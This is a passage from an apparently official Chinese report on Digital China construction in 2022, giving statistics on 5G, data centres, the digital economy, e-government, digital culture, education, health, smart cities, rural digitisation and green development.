型,推动形成绿色低碳的生产方式和生活方式。 三是强化数字中国关键能力。构筑自立自强的数字技术创 新体系,加快推进数字领域关键核心技术突破,强化企业科技 创新主体地位,发挥科技型骨干企业引领支撑作用。筑牢可信 可控的数字安全屏障,切实维护网络安全,增强数据安全保障 能力,提升个人信息保护水平。 四是优化数字化发展环境。建设公平规范的数字治理生态。 完善数字领域法律法规体系,加强立法统筹协调,构建技术标 准体系,引领带动数字技术产业创新。健全网络综合治理体系, 构建科学、高效、有序的管网治网格局,创新推进网络文明建 设。构建开放共赢的数字领域国际合作格局。推动建立多层面 协同、多平台支撑、多主体参与的数字领域国际交流合作体系, 高质量共建“ 数字丝绸之路”。拓展数字领域国际合作空间,共 同培育全球数字化发展新动能。 党的二十大报告指出,要加快建设网络强国、数字中国。 建设数字中国是数字时代推进中国式现代化的重要引擎,是构 筑国家竞争新优势的有力支撑。中共中央、国务院印发《数字 中国建设整体布局规划》,按照夯实基础、赋能全局、强化能 力、优化环境的战略路径,明确了数字中国建设“2522” 的整体 框架,从党和国家事业发展全局的战略高度作出了全面部署。 2022 年,各地区、各部门、各领域积极探索实践,深入推进 数字基础设施、数据资源体系建设,促进数字技术与经济、政 治、文化、社会、生态文明建设各领域深度融合,加快数字技 术创新步伐,提升数字安全保障水平,营造良好数字治理生态, 积极拓展数字领域国际合作,数字中国建设进入整体布局、全 面推进的新阶段。 图 1 数字中国建设“2522”整体框架 【第一篇】数字中国建设基础加快夯实 一、数字基础设施规模能级大幅提升 数字基础设施是数字中国的底座。2022 年,我国网络基 础设施、算力基础设施、应用基础设施规模和服务能力快速增 长,一体化协同发展水平稳步提升。“双千兆” 网络深度覆盖进 程加速,网络基础设施覆盖区域持续下沉。算力基础设施规模 世界领先,“ 东数西算” 工程全面开展。工业互联网、车联网、 能源互联网等应用基础设施加速赋能高质量融合发展。 ( 一)网络基础设施适度超前部署取得重要进展 我国已实现“ 市市通千兆、县县通 5G 、村村通宽带”。截 至 2022 年底,5G 基站数量达 231.2 万个,较 2021 年新增 88.7 万个,总量全球占比超 60%。5G 网络覆盖全国所有地级市城 区、县城城区以及 96%的乡镇镇区,5G 用户达 5.61 亿户。互 联网宽带接入端口数达 10.71 亿个, 同比增加 5320 万个,具 备千兆网络服务能力的 10G PON 端口数达 1523 万个,同比增 加 737. 1 万个。达到千兆城市建设标准的城市增至 110 个,千 兆用户突破 9000 万户,千兆光网已经具备覆盖超过 5 亿户家 庭的能力。互联网带宽达 38T,互联网骨干网总体性能迈入世 界前列。我国移动物联网终端用户数达 18.45 亿户,净增 4.47 亿户,成为世界主要经济体中首个实现“ 物超人” 国家。IPv6 规模部署与应用深入推进,IPv6 活跃用户数达 7.28 亿,移动 网络 IPv6 流量占比近 50%,我国互联网加快向 IPv6 演进升级。 北斗系统已全面服务交通运输、公共安全、应急管理、农林牧 渔等行业,融入电力、通信、金融等基础设施。 图 2 2020 年-2022 年我国移动通信基站和 5G 用户规模情况 数据来源:工业和信息化部 图 3 2017 年-2022 年我国物联网用户情况 数据来源:工业和信息化部 ( 二)算力基础设施进入全面建设阶段 算力基础设施规模加速提升。截至 2022 年底,我国数据 中心机架总规模已超过 650 万标准机架,近 5 年年均增速超过 30%,在用数据中心算力总规模超 180EFLOPS,位居世界第 二。“ 东数西算” 工程从系统布局进入全面建设阶段。2022 年, 京津冀等 8 个国家算力枢纽建设进入深化实施阶段,新开工数 据中心项目超 60 个,新建数据中心规模超 130 万标准机架。 西部数据中心占比稳步提高,“ 东数西算” 干线光纤网络和兰州 等中西部国家互联网骨干直联点加快建设,推动全国算力结构 不断优化。超算发展水平位于全球第一梯队,2022 年最新发 布的全球超级计算机 500 强中,我国共 162 台上榜,总量蝉联 第一,“ 神威太湖之光” 和“ 天河二号”持续位居榜单前十。上海、 天津、武汉、合肥、深圳、成都等城市加快推进智算中心建设。 图 4 2017 年-2022 年我国在用数据中心机架规模 数据来源:工业和信息化部 (三)应用基础设施融合赋能效应逐步显现 工业互联网向网络、平台、安全一体化发展, 已覆盖 45 个国民经济大类和 85%以上的工业大类。截至 2022 年底,工 业互联网标识解析体系全面建成,全国顶级节点累计接入二级 节点 265 个,新增 97 个,服务近 24 万家企业。全国具备行业、 区域影响力的工业互联网平台超过 240 个,重点平台连接设备 超过 8000 万台(套),服务工业企业超过 160 万家。车联网 基础设施建设全面提速。全国累计建设 17 个国家级测试示范 区、4 个国家级车联网先导区、16 个智慧城市基础设施与智能 网联汽车试点城市,完成智能化道路改造超过 5000 公里,从 单条道路测试扩展到区域示范。能源互联网和智能充电设施快 速发展。 二、数据资源体系加快建设 数据资源是数字中国建设的核心要素。2022 年,我国数 据基础制度加快构建,数据资源规模稳步提升,公共数据资源 流通共享能力加强,推动数据要素价值充分释放,助力数字经 济高质量发展。 ( 一)数据基础制度加快构建 2022 年 12 月,中共中央、国务院印发《关于构建数据基 础制度更好发挥数据要素作用的意见》,系统提出我国数据基 础制度框架,从数据产权、流通交易、收益分配、安全治理等 四方面加快构建数据基础制度体系。各地区加快制定出台数据 开发利用的规则制度, 已有 22 个省级行政区、4 个副省级市 出台数据相关条例,促进地方规范推进数据汇聚治理、开放共 享、开发利用、安全保护等工作。多地积极探索数据管理机制 创新。截至 2022 年底,全国已有 26 个省(自治区、直辖市) 设置省级大数据管理服务机构,广东、天津、江苏等地区探索 建立“ 首席数据官”机制。 ( 二)数据资源供给能力不断提升 2022 年我国数据产量达 8. 1ZB ,同比增长 22.7%,占全球 数据总产量 10.5%,位居世界第二。截至 2022 年底,我国存 力总规模超 1000EB,数据存储量达 724.5EB,同比增长 21.1%, 占全球数据总存储量的 14.4%。 我国大数据产业规模达 1.57 万亿元, 同比增长 18%。政务数据开放共享有序推进。 国务 院办公厅印发《全国一体化政务大数据体系建设指南》,深入 推进政务数据共享开放和平台建设。截至 2022 年底,全国一 体化政务数据共享枢纽已接入各级政务部门 5951 个,发布各 类数据资源 1.5 万类,累计支撑共享调用超 5000 亿次。 我国 已有 208 个省级和城市的地方政府上线政府数据开放平台,其 中省级平台 21 个(含省和自治区,不包括直辖市和港澳台), 城市平台 187 个(含直辖市、副省级与地级行政区),较 2021 年新增 1 个省级平台和 14 个城市平台。 图 5 2017 年-2022 年我国数据产量及全球占比情况 数据来源: 中国信息通信研究院、中国网络空间研究院 (三)数据资源流通利用加快探索 公共数据授权运营探索不断深入。北京、上海、广东、浙 江等地区以地方法规形式推动构建公共数据授权运营基本规 则,加速推动落地实践。北京授权建设运营公共数据金融专区, 充分发挥工商、税务、公积金等公共数据对金融服务的支撑作 用;上海授权开展公共数据运营业务,推动以公共数据为牵引, 加快实现公共数据、行业数据、社会数据资源的整合布局。各 地加快探索推进数据交易机构建设,多地交易机构联合开展数 据要素流通标准体系研究,促进数据要素价值释放。截至 2022 年底,全国已成立 48 家数据交易机构。上海数据交易所引导 多元主体加大数据供给,积极构建数商生态体系;北京建成国 内首个基于自主知识产权的数据交易平台,将数据交易全过程 上链存储,推动实现数据合规流通;深圳数据交易所以深港数 据交易合作机制为抓手,积极推动数据跨境交易。 图 6 2014 年-2022 年我国数据交易机构数量增长情况 数据来源:中国信息通信研究院 【第二篇】数字中国建设全面赋能经济社会发展 三、数字经济成为稳增长促转型的重要引擎 发展数字经济是构建现代化经济体系的重要支撑。2022 年,我国数字经济规模达 50.2 万亿元,总量稳居世界第二, 同比名义增长 10.3%, 占国内生产总值比重提升至 41.5%。数 字产业规模稳步增长,数字技术和实体经济融合日益深化,新 业态新模式不断涌现,数字企业加快推进技术、产品与服务创 新能力提升,不断培育发展新动能。 ( 一)数字产业规模稳步增长 2022 年, 电子信息制造业实现营业收入 15.4 万亿元,同 比增长 5.5%。软件业收入跃上十万亿元台阶,达 10.81 万亿 元,同比增长 11.2% 。其中,信息技术服务收入达到 70128 亿 元,同比增长 11.7% ,占全行业收入的比重达 64.9%;云计算、 大数据服务共实现收入 10427 亿元,同比增长 8.7%, 占信息 技术服务收入的比重达 14.9%;集成电路设计收入 2797 亿元, 同比增长 12.0%;电子商务平台技术服务收入 11044 亿元,同 比增长 18.5%。电信业务收入达 1.58 万亿元,同比增长 7.5%。 图 7 2017 年-2022 年我国数字经济规模、同比名义增长及占 GDP 比重 数据来源:中国信息通信研究院 图 8 2020 年-2022 年我国数字产业营收增长情况 数据来源:工业和信息化部 ( 二)数字技术和实体经济融合深入推进 农业数字化加快向全产业链延伸,农业生产信息化率超过 25% ,智能灌溉、精准施肥、智能温室、产品溯源等新模式得 到广泛推广。基于北斗系统的农机自动驾驶系统超过 10 万台 (套),覆盖深耕、插秧、播种、收获、秸秆处理等各个环节。 制造业数字化转型提档升级。2022 年全国工业企业关键工序 数控化率、数字化研发设计工具普及率分别增长至 58.6%和 77.0%, 同比分别提升 3.3 和 2.3 个百分点。工业互联网核心 产业规模超 1.2 万亿元,同比增长 15.5%。5G 融合应用深入发 展, 已融入 52 个国民经济大类,“5G+工业互联网”全国建设 项目超 4000 个。智能制造应用规模和水平大幅提升, 四成以 上制造企业进入数字化网络化制造阶段,制造机器人密度跃居 全球第五位,智能制造装备产业规模达 3 万亿元,市场满足率 超过 50%。启动产业主数据标准生态体系建设,浙江、江苏、 山东等地开展分行业试点。服务业数字化转型深入推进,线上 消费在稳消费中发挥积极作用,全国网上零售额达 13.79 万亿 元, 同比增长 4%。其中,实物商品网上零售额达 11.96 万亿 元,同比增长 6.2%, 占社会消费品零售总额的比重达 27.2%, 创历史新高。线上办公、在线旅行预订、互联网医疗用户规模 分别达 5.4 亿人、4.2 亿人、3.6 亿人,增长率分别达到 15.1%、 6.5% 、21.7%。 图 9 全国工业企业关键工序数控化率、数字化研发设计工具普及率 数据来源:国家工业信息安全发展研究中心 (三)数字企业创新发展动能不断增强 数字企业加大创新研发投入,2022 年我国市值排名前 100 的互联网企业总研发投入达 3384 亿元,同比增长 9.1%。研发 投入前 1000 家民营企业中,计算机、通信和其他电子设备制 造业,以及互联网和相关服务业平均研发强度分别为 7.33%和 6.82%,位居行业排名前两位。创新型数字企业融资支持力度 持续加大,科创板、创业板已上市的战略性新兴产业企业中, 数字领域相关企业占比分别接近 40%和 35%。工业互联网领 域新增上市企业 53 家,首发累计融资规模 581.34 亿元。 图 10 2018 年-2022 年我国市值排名前 100 互联网企业总研发投入 数据来源:根据上市互联网企业财报统计 四、数字政务协同服务效能大幅提升 发展数字政务是推进国家治理体系和治理能力现代化的 重要任务。2022 年,我国数字政务加快向线上线下相协同、 标准规范更统一的方向发展,“ 一网通办”“跨省通办”服务体系 持续优化,有力提升企业和群众的满意度、获得感。政务新媒 体已成为政民互动重要渠道。 ( 一)顶层设计和制度规则加快健全 2022 年,国务院印发《关于加强数字政府建设的指导意 见》,加快数字技术在政府管理服务中的广泛深入应用,推进 政府数字化、智能化转型;印发《关于加快推进政务服务标准 化规范化便利化的指导意见》,进一步推进政务服务运行标准 化、服务供给规范化、企业和群众办事便利化。各地积极推进 数字技术应用与政府职能转变协调配套,探索打造“ 线上+ 线 下”协调管理模式。北京坚持从办好“ 一件事”入手,打造“ 无事 不扰、无处不在” 的一体化综合监管体系;天津打造一批应用 示范场景,强化“双随机、一公开” 监管;浙江全面推进极简审 批许可,加快实现商事主体登记“零干预、零材料、零费用、 零跑动”。 ( 二)党政机关数字化服务能力不断增强 国家电子政务外网覆盖范围持续扩大,已连接 31 个省(自 治区、直辖市)和新疆生产建设兵团,实现地市、县级全覆盖, 乡镇覆盖率达到 96.1%。全国人大代表工作信息化平台正式开 通,汇集办理议案建议群组超 2 万个,推动提升人大代表履职 工作和沟通效率。全国各级政协以信息化赋能委员履职,省级 政协普遍开发履职应用程序,积极开展网络议政、远程协商。 中央纪委国家监委机关推动基层小微权力“ 监督一点通”信息 平台建设完善, 已覆盖 16 个省份 836 个县(市、 区),累计 办结群众投诉 68.7 万件。智慧法院服务能力覆盖 100%高院中 院和 97%基层法院,全国法院电子诉讼占比从 2021 年的 24% 提升至 2022 年的 28%,全国统一司法区块链平台累计完成 28.9 亿条数据上链存证固证,率先出台人民法院在线诉讼、在 线调解、在线运行“ 三大规则”。全国检察机关数字检察工作正 式启动,全年提供律师互联网阅卷服务超 7 万次, 同比增长 159%。数字技术有力支撑群众信访办理,7 日内程序性回复 基本达到 100%。“ 互联网+督查” 深入推进,平台累计访问量上 亿次,成为覆盖面最广、影响力最大、社会参与度最高的政府 监督平台。 (三)在线服务标准化、规范化、便利化水平稳步提升 从 2012 到 2022 年,我国电子政务发展指数国际排名从 78 位上升到 43 位,是上升最快的国家之一。其中“在线服务” 指数排名保持全球领先水平,上海在全球 193 个城市综合排名 中位列第 10 名,城市数字化服务达到国际领先水平。截至 2022 年底,全国一体化政务服务平台实名注册用户超过 10 亿人, 国家政务服务平台总使用量超过 850 亿人次,已初步实现地方 部门 500 万余项政策服务事项和 1 万多项高频应用的标准化服 务,大批高频政务服务事项实现“ 一网通办”“跨省通办” ,有效 解决市场主体和群众办事难、办事慢、办事繁等问题。全国 96.68%的办税缴费实现“ 非接触式” 办理,电子发票服务平台用 户数量突破千万级。电子证照共享服务体系持续完善,已汇聚 31 个省份、新疆生产建设兵团和 26 个部门 900 余种电子证照、 56.72 亿条目录,累计提供电子证照共享服务 79 亿次,有效支 撑“减证便民”。 国家政务服务平台“ 助企纾困服务专区”“ 民生 保障服务专区” 等针对企业和特殊个人群体提供精准保障服 务,助力各地复工复产。广东全面推广数字政府填表报数系统, 推进“ 目录之外无填报、 目录之内系统报、数智赋能少填报”, 大幅压减基层填报的表格数量、数据项和工作量。 图 11 2012 年-2022 年我国电子政务发展指数全球排名变化情况 数据来源:《联合国电子政务调查报告》 图 12 2020 年-2022 年国家政务服务平台累计数据共享调用次数 数据来源:国务院办公厅电子政务办公室、中国互联网络信息中心 (四)政务公开支撑践行全过程人民民主 社会各界借助网络媒体平台积极为党中央、国务院重要工 作建言献策。党的二十大报告起草过程中,中央有关部门专门 开展了网络征求意见活动,收到 854.2 万多条留言。2022 年《政 府工作报告》起草收到网民建言近百万条,报告起草组对 1100 多条代表性建言中的重点意见予以吸收。政府门户网站交流互 动能力持续增强。2022 年,70%以上的政府网站已迁入集约 化平台运行,为企业和群众提供统一便捷的交流访问渠道。各 省市政府通过重要网站平台拓宽重大文件发布征求意见的渠 道,重点围绕“ 六稳”“ 六保”、优化营商环境等重要工作发布政 策解读。政务新媒体发展至 11 万个账号,年发文量超过 2000 万篇,形成了一批引导力强的优质头部账号。整体联动、同频 共振的政策信息传播格局正在构建。 五、数字文化提供文化繁荣发展新动能 发展数字文化是坚定文化自信、提升国家文化软实力和中 华文化影响力的重要举措。2022 年,我国深入推进国家文化 数字化战略实施,数字文化资源不断丰富,公共文化场馆数字 化转型取得积极成效,数字文化产业培育壮大,网络文化蓬勃 发展,数字文化消费进一步提升,助推文化强国建设迈上新台 阶。 ( 一)文化数字化转型加速推进 2022 年, 中共中央办公厅、国务院办公厅印发《关于推 进实施国家文化数字化战略的意见》,推动打造线上线下融合 互动、立体覆盖的文化服务供给体系。文化场馆加快数字化转 型,全国智慧图书馆体系、公共文化云建设项目深入推进。公 共图书馆智慧化服务能力显著提升, 国家公共文化云和 200 多个地方性公共文化云平台服务功能不断完善,数字文化资源 不断丰富。全民阅读、艺术普及数字化服务能力显著提升,我 国数字阅读用户达到 5.3 亿。传统村落数字博物馆建设取得积 极进展,2022 年新增 126 个村落单馆,累计完成 839 个村落 单馆建设,形成了涵盖全景漫游、图文、影音、实景模型等多 种数据类型的传统村落数据库。云演艺、云展览、沉浸式体验 等新应用场景不断涌现。第十三届中国艺术节、纪念毛泽东同 志《在延安文艺座谈会上的讲话》发表 80 周年舞台艺术优秀 剧目展演、新时代舞台艺术优秀剧目展演等各类展演展示活 动,均采用线上线下同步方式打造“ 第二剧场”,让舞台艺术“破 屏穿云”,进一步扩大传播力影响力。2022 年全国“村晚” 示范 展示活动以网络直录播、短视频等形式呈现,线上线下参与约 1. 18 亿人次。 图 13 2017 年-2022 年我国数字阅读用户规模情况 数据来源:中国音像与数字出版协会 ( 二)网络文化创作活力进一步激发 网络文化正能量更加充沛,“ 中国这十年”“ 沿着总书记的 足迹” 等网上重大主题宣传,聚焦宣传阐释习近平新时代中国 特色社会主义思想、展示新时代伟大成就,为党的二十大胜利 召开营造了浓厚热烈的舆论氛围。“ 文艺中国 2022 新春特别节 目”全网累计话题关注量达 3 亿,直播观看量突破 1000 万人次, 视频总观看量达 8135 万人次,赢得海内外广泛赞誉。 网络文 化精品力作迭出,《人世间》《我们这十年》《思想耀江山》 《我和我的新时代》等一批主旋律网络电影、网络纪录片、网 络综艺节目、纪实文艺节目、网络剧等作品热播,获得观众青 睐。数字内容创作蓬勃发展,广大网民积极创作生产向上向善 的网络文化产品。全国重点网络文学企业作品超过 3000 万部, 网络文学用户超过 5 亿,发展势头稳健。我国网文出海吸引约 1.5 亿用户,成为传播中国文化的重要力量。2022 年,我国网 络音乐用户规模达 6.84 亿, 网民使用率 64.1%。 动漫、互联 网文化娱乐平台等文化新业态特征较为明显的 16 个行业实现 营业收入 43860 亿元,同比增长 5.3%。 (三)数字技术与媒体融合深入推进 数字技术应用增强文化服务能力。全国广电机构积极推进 8K 超高清、云转播、 自由视角、VR 节目制作、数字人等高 新视听制播呈现技术示范应用,不断提升观众视听体验。北京、 上海、浙江等地开展有线电视智能推荐服务试点,更好满足人 民群众对高质量、个性化视听节目的需要。2022 年 1 月, 中 央广电总台开播我国第一个 8K 超高清电视频道 CCTV-8K , 开通了“ 百城千屏”超高清传播平台,对北京冬奥会开闭幕式及 赛事进行直播。国家文物局联合中央广电总台推出《中国考古 大会》《中国国宝大会》《古韵新声》等系列节目,应用 VR/AR 等数字技术生动展示文物的文化内涵与时代价值。数字文化市 场用户规模不断壮大,截至 2022 年底,我国网络视频用户规 模近 10.31 亿,网民使用率达 96.5%,其中短视频用户规模首 次突破 10 亿,网民使用率达 94.8%。网络直播用户规模达 7.51 亿,同比增长 6.7%。 网络游戏用户规模超过 6 亿, 占网民整 体的六成以上。 六、数字社会建设推动优质服务资源共享 建设数字社会是保障和改善民生、扎实促进共同富裕的有 效路径。截至 2022 年底,我国网民规模达到 10.67 亿,较去 年同期增长 3549 万人,互联网普及率达 75.6%。 国家教育数 字化战略行动全面实施,数字健康加速发展,社保就业等领域 数字化服务水平不断提升,智慧城市和数字乡村建设深入推 进,全民数字素养与技能提升行动取得积极成效,适老化、无 障碍改造迈上新台阶,数字社会发展更加均衡包容。 ( 一 )国家教育数字化战略行动全面实施 数字化教学条件加速升级。99.89%的中小学(含教学点) 学校带宽达到 100M 以上,超过四分之三的学校实现无线网络 覆盖,99.5%的中小学拥有多媒体教室。 国家教育数字化战略 行动全面实施,国家智慧教育公共服务平台正式开通,建成世 界第一大教育教学资源库,优质教育资源开放共享格局初步形 成。国家中小学智慧教育平台自改版上线以来,汇聚各类优质 教育资源 4.4 万余条,其中课程教学资源 2.5 万课时。 国家职 业教育智慧教育平台接入国家级、省级专业教学资源库 1014 个,精品在线开放课程 6628 门,平台现有各类资源 556 万余 条。慕课数量快速增长,国家高等教育智慧教育平台提供了 2.7 万门优质慕课, 以及 6.5 万余条各类学习资源,用户覆盖 166 个国家和地区。教师信息技术应用能力稳步提升,教育部 先后实施两轮全国中小学教师信息技术应用能力提升工程, “ 三个课堂” 应用、“ 一师一优课、一课一名师” 活动深入推进。 ( 二)数字健康服务资源加速扩容下沉 优质医疗资源向基层延伸拓展,数字化向医疗健康全领域 加速渗透。远程医疗服务平台已覆盖全国 31 个省份及新疆生 产建设兵团,地市级、县级远程医疗服务实现全覆盖,全年共 开展远程医疗服务超 2670 万人次。据初步统计,截至 2022 年 10 月,全国设置超过 2700 家互联网医院,开展互联网诊疗 服务超过 2590 万人次。 1.65 万家基层中医馆接入中医馆健康 信息平台。医保信息化平台覆盖范围持续扩大。全国统一的医 保信息平台全面建成,接入约 40 万家定点医疗机构和 40 万家 定点零售药店,有效覆盖全体参保人。国家医保服务平台实名 用户达 2.8 亿,涵盖 100 余项服务功能。数字技术在辅助诊断、 康复、配送转运、医疗机器人等方面的新应用快速普及,互联 网直播互动式家庭育儿、线上婴幼儿养育课程、父母课堂等新 形式不断涌现。全国体育系统举办全民健身线上运动会,直接 参加人次 1396 万,全网总曝光量超 56.2 亿次。 (三)社保就业数字化服务持续拓展 数字社保服务实现规模化覆盖。截至 2022 年底,全国电 子社保卡领用人数达 7. 15 亿,月活跃用户超 1.27 亿,增速达 40%以上, 已开通服务渠道 486 个、全国服务 86 项,全年累 计访问量达 112.85 亿次。全国人社政务服务平台、国家社保 公共服务平台、掌上 12333 、电子社保卡等全国人社线上服务 渠道持续完善,提供服务 140.98 亿人次。建成企业职工基本 养老保险全国统筹系统,全国基金“ 一本账”基本形成,累计办 理业务 4.49 亿笔。在线就业服务支撑作用进一步发挥。“就业 在线”平台覆盖全国公共就业人才服务机构和经营性人力资源 服务结构,提供近 4000 万岗位信息,为 2865 万人提供求职招 聘服务 1.57 亿人次。 中国公共招聘网与全国 503 家公共就业 人才交流服务机构实现联网, 日均发布招聘岗位 26 万条, 日 常岗位招聘人数约 100 万人。残疾人联合会开展盲人多元就业 网络培训活动,“ 心光绽放助盲项目” 学员超过 7000 人。数字 技术职业认定标准与培育不断扩展。人力资源社会保障部修订 公布《中华人民共和国职业分类大典(2022 年版)》,首次 增加数字职业标识(标识为 S),共标识数字职业 97 个,将 其中的大数据、 区块链、云计算、集成电路、人工智能等 13 个数字技术新职业纳入职称评审范围。 (四)信息惠民建设取得有力进展 道路客运电子客票服务持续推广普及,全国超 2200 个二 级以上客运站累计生成电子客票超 2.82 亿张。住房公积金数 字便民成效初步显现,全国住房公积金小程序全年累计服务 4.25 亿人次,办理住房公积金异地转移接续业务 314 万笔,划 转资金 310 亿元。社会救助精准化水平不断提升,特殊群体便 捷办事服务范围持续扩展。民政部建成全国低收入人口动态监 测平台, 归集完成 6300 多万低收入人口信息。 民政一体化政 务服务平台服务能力持续提升,上线残疾人两项补贴“全程网 办”“社会救助申请专栏” 等,70 项服务事项累计提供服务超过 1100 万次,持续打造“ 惠民直通车”。适老化、无障碍改造行 动加速推进,与老年人、残疾人生活密切相关的 648 家网站和 APP 完成了改造,60 岁以上老年人激活或使用医保电子凭证 实现由家人代办的人数超过 1981 万。电子社保卡推出“ 亲情服 务”“长辈版” 等服务,为老年人提供便捷服务 8400 多万人次。 各主要网约车平台公司在近 300 个城市上线“ 一键叫车” 功能, 累计为 930 余万老年人乘客提供 5300 余万单服务。 图 14 2017 年-2022 年我国网民规模及互联网普及率增长情况 数据来源:中国互联网络信息中心 (五)新型智慧城市发展更加集约高效 数字技术在智慧城市建设中由单项应用向集成融合转变。 新型城市基础设施建设试点在 21 个市(区)稳步推进,城市 信息模型(CIM)基础平台、智能化市政基础设施加速建设。 上海、雄安新区等地积极推动数字孪生城市建设,数字孪生技 术在城市规划建设管理、城市公共设施建设等领域深入应用。 北京昌平区、上海临港新区等 19 个地区加快数字家庭试点建 设。住房城乡建设部以“ 一网统管” 为目标,推动国家、省、市 三级城市运行管理服务平台互联互通,加快推进城市服务治理 业务集成联动,支撑北京、上海等超大型城市提升城市感知、 风险预警、科学决策能力。国务院安全生产委员会办公室推进 深圳、南京、西安、青岛等 18 个城市安全风险综合监测预警 体系建设试点,构建城市生命线、公共安全、生产安全和自然 灾害等领域安全监测感知网络,建设综合监测预警平台,提升 城市安全风险防范、化解、管控的智能化水平。基层数字治理 加快创新探索, 中央网信办等 8 部门联合推进 92 家国家智能 社会治理试验基地建设,科技部支持建设 18 个国家新一代人 工智能创新发展试验区,持续开展长周期、宽领域、跨学科的 人工智能社会实验工作。智慧城市建设标准逐步完善,《城市 信息模型基础平台技术标准》《城市大脑标准体系建设指南 (2022 版)》《新型智慧城市评价指标》《体育场馆智慧化 标准体系建设指南》等一批智慧城市标准规范相继出台。 (六)数字乡村建设迈向规模化部署阶段 截至 2022 年底,我国农村网民规模达 3.08 亿,农村地区 互联网普及率达到 61.9%,城乡地区互联网普及率差异较去年 同期缩小 2.5 个百分点。数字乡村试点深入推进。中央网信办、 农业农村部支持浙江建设数字乡村引领区。首批国家数字乡村 试点完成终期评估,浙江省德清县、北京市平谷区、天津市西 青区、江苏省南京市浦口区、浙江省平湖市、重庆市渝北区等 地区试点建设水平位居全国前列。数字乡村标准化建设步伐加 快。中央网信办等 4 部门印发《数字乡村标准体系建设指南》。 国家标准化管理委员会发布 23 项以数字(智慧)农业为重点 的国家农业标准化示范区项目名单。智慧农业建设快速起步, 农业农村部累计支持 8 个国家数字农业创新中心、分中心以及 41 个国家数字农业创新应用基地建设。农村电商蓬勃发展, 县乡村电子商务体系和快递物流配送体系加快贯通,2022 年 全国农村网络零售额达 2. 17 万亿元,全国农产品网络零售额 达 5313.8 亿元,同比增长 9.2%,增速较 2021 年提升 6.4 个百 分点。乡村数字化治理效能不断提升,全国基层政权建设和社 区治理信息系统覆盖全国 48.9 万个村委会。数字惠民服务体 系不断完善,促进城乡居民共享数字化发展成果。 (七)全民数字素养与技能持续提升 中央网信办等 4 部门印发《2022 年提升全民数字素养与 技能工作要点》,部署 8 个方面共 29 项任务,构建系统推进 工作格局。举办“全民数字素养与技能提升月”,在全国范围内 组织开展数字技能进社区、数字教育大讲堂、数字助老助残志 愿活动等各类主题活动 2.6 万场,直接参与人次超过 2 千万, 覆盖人数 4 亿以上,开放各类数字资源 22.2 万个,相关内容 网上浏览量近 12.6 亿次。中央网信办等 13 个部门联合评选认 定 78 个全民数字素养和技能培训基地,打造协同一体、各具 特色、服务群众的全民数字素养与技能培训网络。黑龙江等地 区深入实施全民数字素养与技能提升行动,从供给侧、需求侧、 环境侧采取务实举措,快速提升全民数字工作、数字生活、数 字学习、数字创新的素养和技能。“全民数字素养与技能提升 平台”建设上线,汇聚重点院校、科研机构、社会组织等多方 资源,推动数字教学资源开放共享。人力资源社会保障部创新 实施数字技术工程师培训项目,制定颁布国家职业标准,开发 新职业培训教程,公布培训和评价机构目录 93 家,初步搭建 起数字技术人才自主培养链。依托二十国集团(G20)数字经 济工作组,提出提升全民数字素养技能相关倡议,将倡议核心 内容纳入 G20 数字经济部长会主席总结。2022 年世界互联网 大会乌镇峰会上成功举办弥合数字鸿沟论坛,搭建高水平对话 交流平台。 七、数字生态文明建设促进绿色低碳发展 建设数字生态文明是实现绿色低碳发展的必然要求。2022 年,数字技术持续赋能生态文明建设,基于数字技术的生态环 境监测预警能力、自然资源管理和国土空间治理能力进一步提 升,在生产、生活、生态治理等多领域深入践行绿色低碳发展 理念,有效助力高质量生态文明建设。 ( 一)生态环境智慧治理水平不断提升 人工智能、大数据、遥感、物联网、云计算等数字技术在 生态环境保护和治理中应用不断深化。生态环境数据资源体系 持续完善,新接或补充更新空气质量乡镇站监测数据、入河入 海排污口信息、危险废物处置转移信息等 33 类数据,新增数 量 17.72 亿条,数据总量达到 169 亿条。国家民用空间基础设 施大气环境监测卫星、陆地生态系统碳监测卫星相继发射并在 轨稳定运行,我国天基碳监测体系建设迈出重要一步。首个国 家碳计量中心成立,开展碳计量重大问题攻关,加强碳计量数 据的采集、分析、评价和应用。 16 个城市开展大气温室气体 及海洋碳汇监测试点工作,已建成 26 个高精度和 90 个中精度 大气温室气体监测站点,上海、深圳等城市基本完成碳监测网 络建设,初步形成城市碳监测评估能力。 自然资源“ 一张图” 和国土空间基础信息平台建设持续完善,“ 一张图” 数据内容超 过 246 类,国土空间基础信息平台可提供以统一底图、统一底 线服务为主的主题数据服务 1176 项、专题应用服务 196 项、 数据产品 181 项,为自然资源审批、监管、决策提供一体化支 撑。数字孪生助推新阶段水利高质量发展。 以数字孪生流域、 数字孪生水网、数字孪生水利工程为主的数字孪生水利框架体 系基本形成,七大江河和 11 个重点水利工程数字孪生建设方 案编制完成,启动实施 94 项数字孪生流域先行先试任务。 ( 二)数字化绿色化协同转型取得初步成效 中央网信办等 5 部门确定在河北省张家口市、黑龙江省齐 齐哈尔市等 10 个地区开展首批数字化绿色化协同转型(双化 协同)综合试点。数字基础设施绿色化改造加速推进。截至 2022 年底,我国已累计建成 153 家国家绿色数据中心,全国 规划在建的大型以上数据中心平均设计电能利用效率(PUE) 降至 1.3,5G 基站单站址能耗比 2019 年商用初期降低 20%以 上。市场监管总局组织对 49 家数据中心开展能源计量审查并 提供计量技术帮扶,有效促进数据中心能源计量管理规范化和 精细化,提升能源计量能力和水平。数字化支撑工业节能减排 降碳作用日益凸显。钢铁行业加快推进超低排放改造工作,截 至 2022 年 10 月底,全国已有 34 家企业 1.82 亿吨粗钢产能完 成全流程超低排放改造。数字化有力支撑能源结构绿色化转 型。国网系统内智能电网调度控制系统超 400 套,智能变电站 超 5000 套, 电力调度控制专用物联网实时测点达 2 亿多个, 推动构建与新能源相适应的新型电力系统。 图 15 2018 年-2022 年我国国家绿色数据中心数量 数据来源:工业和信息化部 (三)数字技术促进绿色低碳生活方式普及 数字技术助力打造绿色宜居生活环境。深圳等城市引导鼓 励数字企业创新,研发垃圾清扫、分类、运输、检测等自动化 设备,开发从投放垃圾分类、转运到处理全链条的智慧化、平 台化管理体系。多地探索利用碳账户、碳积分等形式,推动普 及绿色生活理念。北京、山西、四川、安徽等地上线个人碳账 本,利用大数据、区块链等技术,将群众多场景碳减排数据汇 总量化为碳积分,予以相关兑换奖励,充分调动公众减排降碳 积极性。共享出行推动公众交通更加绿色低碳。互联网租赁自 行车成为越来越多人的出行选择,全国 460 余个城市共投放互 联网租赁自行车 1500 余万辆, 日均订单量 3300 余万单。 【第三篇】数字中国关键能力逐步强化 八、数字技术创新能力持续提升 数字技术创新是数字中国建设的核心动力。2022 年,集 成电路、人工智能、软件、量子信息技术等领域技术创新应用 取得积极进展,数字技术研发能力持续提升,企业创新主体地 